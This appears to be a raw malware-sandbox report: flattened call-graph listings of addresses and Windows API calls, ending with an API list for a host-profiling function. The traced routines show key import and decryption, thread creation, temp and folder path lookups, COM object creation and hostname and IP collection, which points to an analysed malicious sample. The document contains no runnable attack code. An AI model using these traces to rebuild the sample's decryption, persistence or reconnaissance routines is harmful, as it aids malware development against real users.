70510 10009734 TlsGetValue 70497->70510 70500 100071d0 70561 10009788 DecodePointer 70500->70561 70501 100071fa 70512 10009929 70501->70512 70503 10007215 70548 10007175 70503->70548 70507 100071df 70508 100071f0 GetCurrentThreadId 70507->70508 70509 100071e3 GetLastError ExitThread 70507->70509 70508->70503 70511 100071cc 70510->70511 70511->70500 70511->70501 70513 10009935 __lseeki64 70512->70513 70514 10009a37 __lseeki64 70513->70514 70515 1000994d 70513->70515 70562 10006e49 66 API calls 2 library calls 70513->70562 70514->70503 70517 1000995b 70515->70517 70563 10006e49 66 API calls 2 library calls 70515->70563 70519 10009969 70517->70519 70564 10006e49 66 API calls 2 library calls 70517->70564 70521 10009977 70519->70521 70565 10006e49 66 API calls 2 library calls 70519->70565 70523 10009985 70521->70523 70566 10006e49 66 API calls 2 library calls 70521->70566 70525 10009993 70523->70525 70567 10006e49 66 API calls 2 library calls 70523->70567 70527 100099a1 70525->70527 70568 10006e49 66 API calls 2 library calls 70525->70568 70529 100099b2 70527->70529 70569 10006e49 66 API calls 2 library calls 70527->70569 70531 1000c144 __lock 66 API calls 70529->70531 70532 100099ba 70531->70532 70533 100099df 70532->70533 70534 100099c6 InterlockedDecrement 70532->70534 70571 10009a43 LeaveCriticalSection _doexit 70533->70571 70534->70533 70535 100099d1 70534->70535 70535->70533 70570 10006e49 66 API calls 2 library calls 70535->70570 70537 100099ec 70539 1000c144 __lock 66 API calls 70537->70539 70540 100099f3 70539->70540 70541 10009a24 70540->70541 70572 1000df0e 8 API calls 70540->70572 70574 10009a4f LeaveCriticalSection _doexit 70541->70574 70544 10009a31 70575 10006e49 66 API calls 2 library calls 70544->70575 70546 10009a08 70546->70541 70573 1000dfa7 66 API calls 4 library calls 70546->70573 70549 10007181 __lseeki64 70548->70549 70550 1000990f __getptd 66 API calls 70549->70550 70551 10007186 70550->70551 70576 10002fb0 70551->70576 70586 100052d9 
6c37aab3 _Yarn 72070->72073 72072 6c394c68 69 API calls 72071->72072 72071->72073 72072->72073 72074 6c389b10 72122 6c371a30 72074->72122 72076 6c389b45 72144 6c3893e0 GetModuleFileNameA 72076->72144 72078 6c389bae _Yarn 72167 6c387590 72078->72167 72079 6c389b5b _strlen 72079->72078 72522 6c372c20 39 API calls 3 library calls 72079->72522 72082 6c389f77 72086 6c393a5e 29 API calls 72082->72086 72083 6c389c0b error_info_injector 72083->72082 72116 6c389da2 error_info_injector 72083->72116 72196 6c387eb0 72083->72196 72084 6c389e27 CreateThread 72088 6c389e40 WaitForSingleObject 72084->72088 72089 6c389eb3 72084->72089 73150 6c3880e0 Sleep 72084->73150 72087 6c389f7c 72086->72087 72093 6c3729d0 29 API calls 72087->72093 72088->72089 72094 6c389e55 CloseHandle 72088->72094 72252 6c3896a0 GetModuleFileNameA 72089->72252 72091 6c389cbd 72092 6c3893e0 31 API calls 72091->72092 72105 6c389cc9 _strlen 72092->72105 72098 6c389f8f 72093->72098 72099 6c389e64 72094->72099 72101 6c389e83 error_info_injector 72094->72101 72096 6c389dfd CreateThread 72096->72084 72099->72082 72099->72101 72100 6c389ed8 72278 6c3892f0 GetModuleFileNameA 72100->72278 72103 6c389eeb 72289 6c386410 72103->72289 72113 6c389d0b _Yarn error_info_injector 72105->72113 72523 6c372c20 39 API calls 3 library calls 72105->72523 72106 6c389f04 72306 6c3899f0 72106->72306 72112 6c389f2c 72331 6c377e80 GetTempPathA 72112->72331 72113->72082 72204 6c395185 72113->72204 72116->72082 72116->72084 72217 6c388a70 72116->72217 72524 6c393ef1 GetSystemTimeAsFileTime 72122->72524 72124 6c371a64 72526 6c395147 72124->72526 72129 6c395159 39 API calls 72130 6c371abf 72129->72130 72532 6c371c70 72130->72532 72133 6c371b08 72134 6c371b78 72133->72134 72545 6c371000 72133->72545 72563 6c3933d3 72133->72563 72571 6c3718c0 72133->72571 72594 6c393423 29 API calls 2 library calls 72133->72594 72136 6c371bb4 error_info_injector 72134->72136 72137 6c393a5e 29 API calls 72134->72137 72136->72076 72138 6c371bdb 72137->72138 
72595 6c371c00 29 API calls error_info_injector 72138->72595 72142 6c371b67 Sleep 72142->72133 72142->72134 72143 6c371bef 72143->72076 72145 6c38943f _strlen 72144->72145 72146 6c38944a 72145->72146 72147 6c38965e 72145->72147 72150 6c389488 72146->72150 72151 6c3894ac 72146->72151 72159 6c389451 _Yarn 72146->72159 72694 6c3726c0 30 API calls 3 library calls 72147->72694 72149 6c389663 72695 6c3726c0 30 API calls 3 library calls 72149->72695 72154 6c38aa0e 3 API calls 72150->72154 72152 6c38aa0e 3 API calls 72151->72152 72152->72159 72154->72159 72155 6c393a5e 29 API calls 72156 6c389674 72155->72156 72157 6c3729d0 29 API calls 72156->72157 72158 6c38968f 72157->72158 72158->72079 72159->72149 72161 6c38954a 72159->72161 72166 6c38954f _Yarn 72159->72166 72160 6c38958c error_info_injector 72160->72079 72162 6c3895de 72161->72162 72163 6c3895be 72161->72163 72161->72166 72165 6c38aa0e 3 API calls 72162->72165 72164 6c38aa0e 3 API calls 72163->72164 72164->72166 72165->72166 72166->72155 72166->72160 72168 6c3875e4 72167->72168 72696 6c37c580 72168->72696 72170 6c3875f8 72195 6c387697 error_info_injector 72170->72195 72715 6c387880 72170->72715 72173 6c37a100 72 API calls 72175 6c3877de std::ios_base::_Ios_base_dtor 72173->72175 72175->72083 72177 6c387671 72181 6c3876cb 72177->72181 72182 6c3876e4 72177->72182 72186 6c387676 __fread_nolock 72177->72186 72178 6c387812 72757 6c3726c0 30 API calls 3 library calls 72178->72757 72180 6c387817 72183 6c393a5e 29 API calls 72180->72183 72184 6c38aa0e 3 API calls 72181->72184 72185 6c38aa0e 3 API calls 72182->72185 72187 6c38781c 72183->72187 72184->72186 72185->72186 72740 6c387ca0 75 API calls Concurrency::cancel_current_task 72186->72740 72758 6c37a050 72 API calls std::ios_base::_Ios_base_dtor 72187->72758 72190 6c387838 72190->72083 72191 6c38773c 72192 6c387799 72191->72192 72193 6c38774b 72191->72193 72741 6c379b70 72192->72741 72193->72180 72193->72195 72195->72173 72884 6c376eb0 72196->72884 72198 6c387f15 
error_info_injector 72199 6c387fae error_info_injector 72198->72199 72200 6c393a5e 29 API calls 72198->72200 72199->72091 72201 6c387fdc 72200->72201 72202 6c3729d0 29 API calls 72201->72202 72203 6c387fef 72202->72203 72203->72091 72205 6c39519d 72204->72205 72206 6c395193 72204->72206 72208 6c3951ef __wsopen_s 39 API calls 72205->72208 72207 6c3a357e 16 API calls 72206->72207 72209 6c39519a 72207->72209 72210 6c3951b7 72208->72210 72209->72116 72211 6c38f7f4 __wsopen_s 17 API calls 72210->72211 72213 6c3951c4 72211->72213 73038 6c386110 72217->73038 72219 6c388b24 72221 6c388b70 _Yarn error_info_injector 72219->72221 73049 6c372c20 39 API calls 3 library calls 72219->73049 72223 6c388cd1 GetFileAttributesA 72221->72223 72247 6c389163 error_info_injector 72221->72247 72222 6c393a5e 29 API calls 72224 6c3891ef 72222->72224 72225 6c388ce1 SHGetFolderPathA 72223->72225 72223->72247 73053 6c3726c0 30 API calls 3 library calls 72224->73053 72231 6c388cfd _strlen 72225->72231 72225->72247 72227 6c3891c5 error_info_injector 72227->72096 72228 6c3891fb 72229 6c3729d0 29 API calls 72228->72229 72230 6c389212 72229->72230 72230->72096 72231->72224 72232 6c388d8d 72231->72232 72233 6c388d6e 72231->72233 72236 6c388d2a _Yarn 72231->72236 72234 6c38aa0e 3 API calls 72232->72234 72235 6c38aa0e 3 API calls 72233->72235 72234->72236 72235->72236 72239 6c388e04 72236->72239 73050 6c372c20 39 API calls 3 library calls 72236->73050 72238 6c388eac _Yarn 72242 6c388f4d error_info_injector 72238->72242 73052 6c372c20 39 API calls 3 library calls 72238->73052 72239->72238 73051 6c372c20 39 API calls 3 library calls 72239->73051 72243 6c389091 GetFileAttributesA 72242->72243 72242->72247 72244 6c3890a1 CoInitialize CoCreateInstance 72243->72244 72243->72247 72245 6c3890c9 MultiByteToWideChar 72244->72245 72246 6c38915d CoUninitialize 72244->72246 72250 6c389103 72245->72250 72246->72247 72247->72222 72247->72227 72249 6c38914b 72249->72246 72250->72249 72251 6c389126 MultiByteToWideChar 
72250->72251 72251->72249 72253 6c3896ff _strlen 72252->72253 72254 6c38970a 72253->72254 72255 6c38999f 72253->72255 72256 6c389711 _Yarn 72254->72256 72258 6c389748 72254->72258 72259 6c389766 72254->72259 73055 6c3726c0 30 API calls 3 library calls 72255->73055 72260 6c3899a4 72256->72260 72269 6c389877 72256->72269 72277 6c3898b9 error_info_injector 72256->72277 72262 6c38aa0e 3 API calls 72258->72262 72263 6c38aa0e 3 API calls 72259->72263 73056 6c375880 72260->73056 72262->72256 72263->72256 72264 6c3899b0 73059 6c3726c0 30 API calls 3 library calls 72264->73059 72266 6c393a5e 29 API calls 72267 6c3899c1 72266->72267 72268 6c3729d0 29 API calls 72267->72268 72270 6c3899df 72268->72270 72269->72264 72271 6c389896 72269->72271 72270->72100 72272 6c389926 72271->72272 72273 6c389906 72271->72273 72276 6c38989d _Yarn 72271->72276 72274 6c38aa0e 3 API calls 72272->72274 72275 6c38aa0e 3 API calls 72273->72275 72274->72276 72275->72276 72276->72266 72276->72277 72277->72100 72279 6c38932b _strlen 72278->72279 72280 6c3893ce 72279->72280 72281 6c389336 72279->72281 73061 6c3726c0 30 API calls 3 library calls 72280->73061 72283 6c38936e 72281->72283 72284 6c389397 72281->72284 72288 6c38933d _Yarn 72281->72288 72286 6c38aa0e 3 API calls 72283->72286 72287 6c38aa0e 3 API calls 72284->72287 72285 6c3893d3 72286->72288 72287->72288 72288->72103 72290 6c386434 _strlen 72289->72290 72291 6c3864c9 72290->72291 72292 6c38643f 72290->72292 73062 6c3726c0 30 API calls 3 library calls 72291->73062 72294 6c386497 72292->72294 72295 6c386477 72292->72295 72299 6c386446 _Yarn 72292->72299 72296 6c38aa0e 3 API calls 72294->72296 72298 6c38aa0e 3 API calls 72295->72298 72296->72299 72297 6c3864f9 error_info_injector 72297->72106 72298->72299 72299->72106 72300 6c3864ce 72300->72297 72301 6c393a5e 29 API calls 72300->72301 72302 6c38652c 72301->72302 72303 6c386559 error_info_injector 72302->72303 72304 6c393a5e 29 API calls 72302->72304 72303->72106 72305 6c386592 72304->72305 
72307 6c389a09 GetModuleHandleA 72306->72307 72308 6c389a07 72306->72308 72309 6c389a1b __fread_nolock 72307->72309 72310 6c389a85 72307->72310 72308->72307 72311 6c389a2c GetModuleFileNameA 72309->72311 72322 6c3729d0 72310->72322 72311->72310 72312 6c389a43 _strlen 72311->72312 72313 6c389b01 72312->72313 72314 6c389a65 72312->72314 73063 6c3726c0 30 API calls 3 library calls 72313->73063 72317 6c389aca 72314->72317 72318 6c389ab3 72314->72318 72321 6c389a6c _Yarn 72314->72321 72316 6c389b06 72320 6c38aa0e 3 API calls 72317->72320 72319 6c38aa0e 3 API calls 72318->72319 72319->72321 72320->72321 72321->72310 72323 6c3729dc 72322->72323 72324 6c372a03 error_info_injector 72322->72324 72323->72324 72325 6c393a5e 29 API calls 72323->72325 72324->72112 72326 6c372a26 _Yarn 72325->72326 72327 6c372b92 error_info_injector 72326->72327 72328 6c393a5e 29 API calls 72326->72328 72327->72112 72329 6c372bdf 72328->72329 72330 6c3729d0 29 API calls 72329->72330 72334 6c377ef7 _strlen 72331->72334 72332 6c3795b7 73089 6c3726c0 30 API calls 3 library calls 72332->73089 72334->72332 72335 6c377f60 72334->72335 72336 6c377f49 72334->72336 72341 6c377f09 _Yarn 72334->72341 72339 6c38aa0e 3 API calls 72335->72339 72338 6c38aa0e 3 API calls 72336->72338 72337 6c3795bc 73090 6c3726c0 30 API calls 3 library calls 72337->73090 72338->72341 72339->72341 72348 6c377fe0 72341->72348 73070 6c372c20 39 API calls 3 library calls 72341->73070 72350 6c37b880 130 API calls 72348->72350 72355 6c378074 error_info_injector 72350->72355 72522->72078 72523->72113 72525 6c393f2a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72524->72525 72525->72124 72596 6c39a893 GetLastError 72526->72596 72529 6c395159 72530 6c39a893 __Getctype 39 API calls 72529->72530 72531 6c371a9c 72530->72531 72531->72129 72533 6c371de5 72532->72533 72535 6c371ccb 72532->72535 72632 6c371df0 30 API calls 2 library calls 72533->72632 72536 6c371d24 72535->72536 72537 6c371ce2 72535->72537 72543 6c371cfe _Yarn 72535->72543 72538 
6c38aa0e 3 API calls 72536->72538 72537->72533 72540 6c371cee 72537->72540 72538->72543 72539 6c393a5e 29 API calls 72541 6c371def 72539->72541 72542 6c38aa0e 3 API calls 72540->72542 72542->72543 72543->72539 72544 6c371db3 error_info_injector 72543->72544 72544->72133 72546 6c37100d 72545->72546 72547 6c371039 72545->72547 72546->72547 72550 6c3711b0 39 API calls 72546->72550 72633 6c3711b0 72547->72633 72549 6c371048 72551 6c371136 72549->72551 72555 6c3711b0 39 API calls 72549->72555 72550->72546 72552 6c371169 72551->72552 72554 6c3711b0 39 API calls 72551->72554 72553 6c3711b0 39 API calls 72552->72553 72556 6c371178 72553->72556 72554->72551 72555->72549 72557 6c3711b0 39 API calls 72556->72557 72558 6c37118a 72557->72558 72643 6c3715d0 72558->72643 72561 6c3711b0 39 API calls 72562 6c3711a2 72561->72562 72562->72133 72564 6c3933df ___scrt_is_nonwritable_in_current_image 72563->72564 72666 6c393d46 EnterCriticalSection 72564->72666 72566 6c3933e6 72667 6c393691 72566->72667 72572 6c3718e7 72571->72572 72573 6c37193c 72572->72573 72578 6c371b16 72572->72578 72574 6c3719a2 72573->72574 72576 6c395159 39 API calls 72573->72576 72583 6c38aa82 _ValidateLocalCookies 5 API calls 72574->72583 72575 6c3718c0 95 API calls 72577 6c371b67 Sleep 72575->72577 72580 6c371978 72576->72580 72577->72578 72579 6c371b78 72577->72579 72578->72575 72581 6c371000 75 API calls 72578->72581 72585 6c3933d3 28 API calls 72578->72585 72692 6c393423 29 API calls 2 library calls 72578->72692 72586 6c371bb4 error_info_injector 72579->72586 72589 6c393a5e 29 API calls 72579->72589 72582 6c395159 39 API calls 72580->72582 72581->72578 72587 6c371984 72582->72587 72584 6c371a1f 72583->72584 72584->72142 72585->72578 72586->72142 72587->72574 72588 6c371c70 30 API calls 72587->72588 72588->72574 72591 6c371bdb 72589->72591 72693 6c371c00 29 API calls error_info_injector 72591->72693 72593 6c371bef 72593->72142 72594->72133 72595->72143 72597 6c39a8a9 72596->72597 72598 6c39a8af 72596->72598 
72623 6c39c942 6 API calls std::_Lockit::_Lockit 72597->72623 72602 6c39a8b3 SetLastError 72598->72602 72624 6c39c981 6 API calls std::_Lockit::_Lockit 72598->72624 72601 6c39a8cb 72601->72602 72604 6c39cf6f __dosmaperr 14 API calls 72601->72604 72606 6c39a948 72602->72606 72607 6c371a6d 72602->72607 72605 6c39a8e0 72604->72605 72608 6c39a8f9 72605->72608 72609 6c39a8e8 72605->72609 72631 6c393fb8 39 API calls std::locale::_Setgloballocale 72606->72631 72607->72529 72626 6c39c981 6 API calls std::_Lockit::_Lockit 72608->72626 72625 6c39c981 6 API calls std::_Lockit::_Lockit 72609->72625 72614 6c39a8f6 72628 6c39a607 14 API calls __dosmaperr 72614->72628 72615 6c39a905 72616 6c39a909 72615->72616 72617 6c39a920 72615->72617 72627 6c39c981 6 API calls std::_Lockit::_Lockit 72616->72627 72629 6c39abd0 14 API calls __dosmaperr 72617->72629 72621 6c39a92b 72630 6c39a607 14 API calls __dosmaperr 72621->72630 72623->72598 72624->72601 72625->72614 72626->72615 72627->72614 72628->72602 72629->72621 72630->72602 72632->72543 72634 6c3711e8 _strlen 72633->72634 72642 6c371259 72634->72642 72655 6c372060 39 API calls Concurrency::cancel_current_task 72634->72655 72638 6c3714a6 72638->72549 72639 6c371493 72639->72638 72656 6c372d90 39 API calls Concurrency::cancel_current_task 72639->72656 72642->72639 72657 6c372300 38 API calls 72642->72657 72658 6c3726d0 30 API calls 3 library calls 72642->72658 72659 6c38d2b3 RaiseException 72642->72659 72644 6c37160f 72643->72644 72648 6c37164d 72644->72648 72654 6c371623 72644->72654 72660 6c372060 39 API calls Concurrency::cancel_current_task 72644->72660 72647 6c37175d 72650 6c371197 72647->72650 72662 6c372d90 39 API calls Concurrency::cancel_current_task 72647->72662 72648->72654 72661 6c372eb0 67 API calls 2 library calls 72648->72661 72650->72561 72654->72647 72663 6c372300 38 API calls 72654->72663 72664 6c3726d0 30 API calls 3 library calls 72654->72664 72665 6c38d2b3 RaiseException 72654->72665 72655->72642 72656->72638 
72657->72642 72658->72642 72659->72642 72660->72648 72661->72654 72662->72650 72663->72654 72664->72654 72665->72654 72666->72566 72668 6c3936af 72667->72668 72669 6c3936be 72668->72669 72686 6c3a0a69 CreateFileW ___initconin 72668->72686 72672 6c38aa82 _ValidateLocalCookies 5 API calls 72669->72672 72671 6c3936cb 72671->72669 72687 6c3a0ada 5 API calls ___initconin 72671->72687 72674 6c3933f4 72672->72674 72683 6c39341a 72674->72683 72675 6c3936dc 72675->72669 72676 6c39371c 72675->72676 72680 6c393709 __alloca_probe_16 72675->72680 72682 6c393746 72675->72682 72688 6c39a641 15 API calls __dosmaperr 72676->72688 72679 6c393722 72679->72680 72680->72682 72689 6c3a0b20 5 API calls ___initconin 72680->72689 72690 6c38cb0b 14 API calls ___std_type_info_destroy_list 72682->72690 72691 6c393d5d LeaveCriticalSection 72683->72691 72685 6c393405 72685->72133 72686->72671 72687->72675 72688->72679 72689->72682 72690->72669 72691->72685 72692->72578 72693->72593 72694->72149 72695->72166 72697 6c37c5b5 72696->72697 72698 6c37bd70 77 API calls 72697->72698 72699 6c37c656 72698->72699 72700 6c38aa0e 3 API calls 72699->72700 72701 6c37c68e 72700->72701 72702 6c38b2cf 44 API calls 72701->72702 72703 6c37c6a2 72702->72703 72704 6c37bb60 118 API calls 72703->72704 72705 6c37c74b 72704->72705 72706 6c37c785 72705->72706 72759 6c372300 38 API calls 72705->72759 72706->72170 72708 6c37c7bf 72760 6c3726d0 30 API calls 3 library calls 72708->72760 72710 6c37c7d1 72761 6c38d2b3 RaiseException 72710->72761 72712 6c37c7e6 72713 6c37a100 72 API calls 72712->72713 72714 6c37c7ff 72713->72714 72714->72170 72716 6c3878bf 72715->72716 72762 6c37cd30 72716->72762 72719 6c38761b 72721 6c387a10 72719->72721 72722 6c387a79 72721->72722 72723 6c387b55 72721->72723 72726 6c37cd30 75 API calls 72722->72726 72875 6c372300 38 API calls 72723->72875 72725 6c387b7e 72876 6c372370 30 API calls 72725->72876 72728 6c387aa1 72726->72728 72730 6c387ab5 72728->72730 72739 6c37ac40 70 API calls 72728->72739 
72729 6c387b90 72877 6c38d2b3 RaiseException 72729->72877 72732 6c387651 72730->72732 72878 6c372300 38 API calls 72730->72878 72732->72177 72732->72178 72734 6c387bca 72879 6c3726d0 30 API calls 3 library calls 72734->72879 72736 6c387be5 72880 6c38d2b3 RaiseException 72736->72880 72738 6c387bfa 72739->72730 72740->72191 72742 6c379b89 72741->72742 72752 6c379bb9 72741->72752 72744 6c37b030 69 API calls 72742->72744 72743 6c379c7a 72746 6c38aa82 _ValidateLocalCookies 5 API calls 72743->72746 72747 6c379baf 72744->72747 72745 6c379c8c 72881 6c372300 38 API calls 72745->72881 72748 6c379c85 72746->72748 72750 6c394007 69 API calls 72747->72750 72748->72195 72750->72752 72751 6c379cbc 72882 6c372370 30 API calls 72751->72882 72752->72743 72752->72745 72754 6c379ccc 72883 6c38d2b3 RaiseException 72754->72883 72756 6c379cd7 72757->72180 72758->72190 72759->72708 72760->72710 72761->72712 72763 6c37cda1 72762->72763 72764 6c37cd6c 72762->72764 72766 6c37cdb2 72763->72766 72793 6c372060 39 API calls Concurrency::cancel_current_task 72763->72793 72765 6c37cd9a 72764->72765 72795 6c372300 38 API calls 72764->72795 72765->72719 72780 6c37ac40 72765->72780 72766->72765 72794 6c374ca0 67 API calls 3 library calls 72766->72794 72769 6c37cf7f 72796 6c372370 30 API calls 72769->72796 72771 6c37cf8e 72797 6c38d2b3 RaiseException 72771->72797 72775 6c37cfcb 72799 6c372370 30 API calls 72775->72799 72777 6c37cfe1 72800 6c38d2b3 RaiseException 72777->72800 72779 6c37cdec 72779->72765 72798 6c372300 38 API calls 72779->72798 72781 6c37ac92 72780->72781 72782 6c37acdc 72780->72782 72784 6c37b030 69 API calls 72781->72784 72783 6c38aa82 _ValidateLocalCookies 5 API calls 72782->72783 72792 6c37acfe 72783->72792 72785 6c37ac9d 72784->72785 72785->72782 72786 6c37acb9 72785->72786 72801 6c392fee 72785->72801 72786->72782 72805 6c394614 72786->72805 72789 6c37acd1 72789->72782 72790 6c37ad0a 72789->72790 72791 6c38aa82 _ValidateLocalCookies 5 API calls 72790->72791 72791->72792 
72792->72719 72793->72766 72794->72779 72795->72769 72796->72771 72797->72779 72798->72775 72799->72777 72800->72765 72802 6c393001 __wsopen_s 72801->72802 72803 6c393267 67 API calls 72802->72803 72804 6c393016 __wsopen_s 72803->72804 72804->72786 72806 6c39461f 72805->72806 72807 6c394634 72805->72807 72823 6c392f04 14 API calls __dosmaperr 72806->72823 72809 6c39463c 72807->72809 72810 6c394651 72807->72810 72825 6c392f04 14 API calls __dosmaperr 72809->72825 72819 6c39feff 72810->72819 72812 6c394624 72824 6c393a4e 29 API calls __wsopen_s 72812->72824 72814 6c39464c 72814->72789 72816 6c394641 72826 6c393a4e 29 API calls __wsopen_s 72816->72826 72817 6c39462f 72817->72789 72820 6c39ff13 __wsopen_s 72819->72820 72827 6c3a04a8 72820->72827 72822 6c39ff1f __wsopen_s 72822->72814 72823->72812 72824->72817 72825->72816 72826->72814 72828 6c3a04b4 ___scrt_is_nonwritable_in_current_image 72827->72828 72829 6c3a04bb 72828->72829 72830 6c3a04de 72828->72830 72853 6c393bf7 29 API calls 2 library calls 72829->72853 72838 6c3900a9 EnterCriticalSection 72830->72838 72833 6c3a04d4 72833->72822 72834 6c3a04ec 72839 6c3a0307 72834->72839 72836 6c3a04fb 72854 6c3a052d LeaveCriticalSection __fread_nolock 72836->72854 72838->72834 72840 6c3a033e 72839->72840 72841 6c3a0316 72839->72841 72843 6c39f3a2 __fread_nolock 29 API calls 72840->72843 72858 6c393bf7 29 API calls 2 library calls 72841->72858 72844 6c3a0347 72843->72844 72855 6c39fd39 72844->72855 72845 6c3a0331 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72845->72836 72848 6c3a03f1 72859 6c39ff91 34 API calls 4 library calls 72848->72859 72849 6c3a0408 72849->72845 72860 6c3a013c 33 API calls 2 library calls 72849->72860 72851 6c3a0400 72851->72845 72853->72833 72854->72833 72861 6c39fd57 72855->72861 72858->72845 72859->72851 72860->72845 72862 6c39fd63 ___scrt_is_nonwritable_in_current_image 72861->72862 72863 6c39fda6 72862->72863 72865 6c39fdec 72862->72865 72871 6c39fd52 72862->72871 72873 6c393bf7 29 API calls 2 
library calls 72863->72873 72872 6c3a7171 EnterCriticalSection 72865->72872 72867 6c39fdf2 72868 6c39fe13 72867->72868 72869 6c39fe7c __fread_nolock 31 API calls 72867->72869 72874 6c39fe74 LeaveCriticalSection __wsopen_s 72868->72874 72869->72868 72871->72845 72871->72848 72871->72849 72872->72867 72873->72871 72874->72871 72875->72725 72876->72729 72877->72730 72878->72734 72879->72736 72880->72738 72881->72751 72882->72754 72883->72756 72933 6c376520 72884->72933 72886 6c376eee _Yarn 72887 6c376faf CryptAcquireContextW 72886->72887 72888 6c3773c2 72887->72888 72889 6c376fdc CryptImportKey 72887->72889 72957 6c38d87e 29 API calls 2 library calls 72888->72957 72891 6c377032 CryptSetKeyParam 72889->72891 72892 6c37742a CryptReleaseContext 72889->72892 72895 6c377494 CryptDestroyKey CryptReleaseContext 72891->72895 72896 6c37704a CryptSetKeyParam 72891->72896 72959 6c38d87e 29 API calls 2 library calls 72892->72959 72894 6c377404 72958 6c38d2b3 RaiseException 72894->72958 72961 6c38d87e 29 API calls 2 library calls 72895->72961 72900 6c377507 CryptDestroyKey CryptReleaseContext 72896->72900 72901 6c377070 72896->72901 72897 6c37746e 72960 6c38d2b3 RaiseException 72897->72960 72963 6c38d87e 29 API calls 2 library calls 72900->72963 72906 6c3775d8 72901->72906 72910 6c3770d7 72901->72910 72911 6c3770b3 72901->72911 72921 6c3770bc _Yarn 72901->72921 72903 6c3774e1 72962 6c38d2b3 RaiseException 72903->72962 72905 6c377422 72967 6c3726c0 30 API calls 3 library calls 72905->72967 72968 6c377640 54 API calls 4 library calls 72906->72968 72907 6c377115 CryptDecrypt CryptDestroyKey CryptReleaseContext 72914 6c377574 72907->72914 72925 6c377147 __fread_nolock 72907->72925 72909 6c377551 72964 6c38d2b3 RaiseException 72909->72964 72918 6c38aa0e 3 API calls 72910->72918 72917 6c38aa0e 3 API calls 72911->72917 72965 6c38d87e 29 API calls 2 library calls 72914->72965 72917->72921 72918->72921 72919 6c3775dd 72969 6c376720 72919->72969 72920 6c3775aa 72966 6c38d2b3 RaiseException 
72920->72966 72921->72907 72924 6c3775ef 72924->72198 72925->72905 72926 6c377212 72925->72926 72927 6c37722b 72925->72927 72930 6c3771cf _Yarn error_info_injector 72925->72930 72929 6c38aa0e 3 API calls 72926->72929 72928 6c38aa0e 3 API calls 72927->72928 72928->72930 72929->72930 72931 6c393a5e 29 API calls 72930->72931 72932 6c377398 error_info_injector 72930->72932 72931->72888 72932->72198 72934 6c376561 CryptStringToBinaryA 72933->72934 72935 6c37655f 72933->72935 72936 6c37657e 72934->72936 72937 6c37662b 72934->72937 72935->72934 72941 6c3765cd 72936->72941 72942 6c3765aa 72936->72942 72955 6c3765b3 __fread_nolock 72936->72955 72956 6c376691 72936->72956 73014 6c3766c0 29 API calls 2 library calls 72937->73014 72939 6c37663a 73015 6c38d2b3 RaiseException 72939->73015 72940 6c376600 CryptStringToBinaryA 72946 6c376645 72940->72946 72947 6c376618 72940->72947 72949 6c38aa0e 3 API calls 72941->72949 72948 6c38aa0e 3 API calls 72942->72948 72945 6c376699 72950 6c376720 46 API calls 72945->72950 73016 6c38d87e 29 API calls 2 library calls 72946->73016 72947->72886 72948->72955 72949->72955 72952 6c3766af 72950->72952 72952->72886 72953 6c376672 73017 6c38d2b3 RaiseException 72953->73017 72955->72940 73018 6c377640 54 API calls 4 library calls 72956->73018 72957->72894 72958->72905 72959->72897 72960->72905 72961->72903 72962->72905 72963->72909 72964->72905 72965->72920 72966->72905 72967->72906 72968->72919 72970 6c37672a 72969->72970 72971 6c37674a error_info_injector 72969->72971 72970->72971 72972 6c393a5e 29 API calls 72970->72972 72971->72924 72973 6c376775 CryptAcquireContextW 72972->72973 72975 6c376e09 72973->72975 72996 6c376814 __fread_nolock 72973->72996 73029 6c38d87e 29 API calls 2 library calls 72975->73029 72977 6c37685e CryptCreateHash 72980 6c376d1c CryptReleaseContext 72977->72980 72977->72996 72978 6c3769e8 CryptReleaseContext 73011 6c376a0a _Yarn error_info_injector 72978->73011 72979 6c376e42 73030 6c38d2b3 RaiseException 72979->73030 73025 
6c38d87e 29 API calls 2 library calls 72980->73025 72982 6c376884 CryptHashData 72984 6c376d8d CryptDestroyHash CryptReleaseContext 72982->72984 72982->72996 73027 6c38d87e 29 API calls 2 library calls 72984->73027 72985 6c376c52 72987 6c376720 30 API calls 72985->72987 72986 6c376d60 73026 6c38d2b3 RaiseException 72986->73026 72990 6c376e7f 72987->72990 72993 6c376720 30 API calls 72990->72993 72991 6c376dda 73028 6c38d2b3 RaiseException 72991->73028 72995 6c376e87 72993->72995 72994 6c3768e7 CryptHashData 72997 6c376904 CryptGetHashParam 72994->72997 72998 6c376c5a CryptDestroyHash CryptReleaseContext 72994->72998 72995->72924 72996->72977 72996->72978 72996->72982 72996->72994 73004 6c376980 CryptGetHashParam CryptDestroyHash 72996->73004 72997->72996 72999 6c376cbb CryptDestroyHash CryptReleaseContext 72997->72999 73021 6c38d87e 29 API calls 2 library calls 72998->73021 73023 6c38d87e 29 API calls 2 library calls 72999->73023 73001 6c376c9b 73022 6c38d2b3 RaiseException 73001->73022 73004->72996 73007 6c376c02 CryptReleaseContext 73004->73007 73005 6c376cfc 73024 6c38d2b3 RaiseException 73005->73024 73019 6c38d87e 29 API calls 2 library calls 73007->73019 73009 6c376bdf error_info_injector 73009->72924 73010 6c393a5e 29 API calls 73010->72975 73011->73009 73011->73010 73012 6c376c3a 73020 6c38d2b3 RaiseException 73012->73020 73014->72939 73015->72946 73016->72953 73017->72956 73018->72945 73019->73012 73020->72985 73021->73001 73022->72985 73023->73005 73024->72985 73025->72986 73026->72985 73027->72991 73028->72985 73029->72979 73030->72985 73039 6c38614e 73038->73039 73040 6c3862cc 73039->73040 73042 6c3861ba 73039->73042 73048 6c386152 _Yarn 73039->73048 73054 6c3726c0 30 API calls 3 library calls 73040->73054 73044 6c386252 73042->73044 73045 6c3861da 73042->73045 73043 6c3862d1 73043->72219 73046 6c38aa0e 3 API calls 73044->73046 73047 6c38aa0e 3 API calls 73045->73047 73046->73048 73047->73048 73048->72219 73049->72221 73050->72239 73051->72238 

Control-flow Graph (function at 34e5430)
APIs
  • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
• _memset.LIBCMT ref: 034E546C
• _memset.LIBCMT ref: 034E5485
• _memset.LIBCMT ref: 034E5495
• gethostname.WS2_32(?,00000032), ref: 034E54A3
• gethostbyname.WS2_32(?), ref: 034E54AD
• inet_ntoa.WS2_32 ref: 034E54C5
• _strcat_s.LIBCMT ref: 034E54D8
• _strcat_s.LIBCMT ref: 034E54F1
• inet_ntoa.WS2_32 ref: 034E551A
• _strcat_s.LIBCMT ref: 034E552D
• _strcat_s.LIBCMT ref: 034E5546
